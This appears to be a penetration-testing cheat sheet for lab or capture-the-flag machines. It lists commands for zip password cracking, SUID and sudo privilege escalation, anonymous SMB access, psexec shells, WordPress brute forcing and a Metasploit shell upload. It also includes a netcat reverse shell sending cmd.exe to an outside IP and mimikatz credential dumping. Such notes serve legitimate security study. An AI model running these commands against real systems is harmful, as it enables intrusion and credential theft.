1. Crack the Passwd of Zip Package

zip2john backup.zip > passwd.txt
john passwd.txt

2. Find

  1. Find file with suid
find / -perm -u=s 2>/dev/null

If we got it ,we can go to GTFobins to check out whether it is possible for Privilege Escalation

  1. Find file for special group
find / -type f -group bugtracker 2>/dev/null
  1. Find file
# linux
find / -name "user.txt"
# powershell
Get-ChildItem  -Recurse –Filter user.txt

3. smb

If the target machine with port 445 opened, we can check out the file under directory if no auth:

smbclient -N -L ////ip

and then dump file from directory:

smbclient  \\\\10.10.10.27\\backup/
get filename

When we got the username and password, to get a shell

python3 psexec.py adminstrator@10.10.10.27

4. Upgrade Shell to tty

SHELL=/bin/bash script -q /dev/null
# or
python3 -c "import pty;pty.spawn('/bin/bash')"

5. Sudo

view the special permissions of current role:

sudo -l

When a command can be executed with sudo , we can use this command to open a new bash shell to get root privilege .

For example, ! /bin/bash in Vim.

6. Website

Search for subdirectory

gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/big.txt

Analyze

nikto -host http://10.10.10.28 -o _28.html

WordPress

Enumerate accounts and Brute Force the password

wpscan --url http://10.10.10.29/wordpress --enumerate
wpscan --url http://10.10.10.29/wordpress -U users.txt -P backupPasswords

use metasploit

use exploit/unix/webapp/wp_admin_shell_upload

NetCat

Reverse:

nc.exe -a "-e cmd.exe 10.10.16.4 7777"

Listen:

nc -lvpn 4444

Dump Cached password

./mimikatz.exe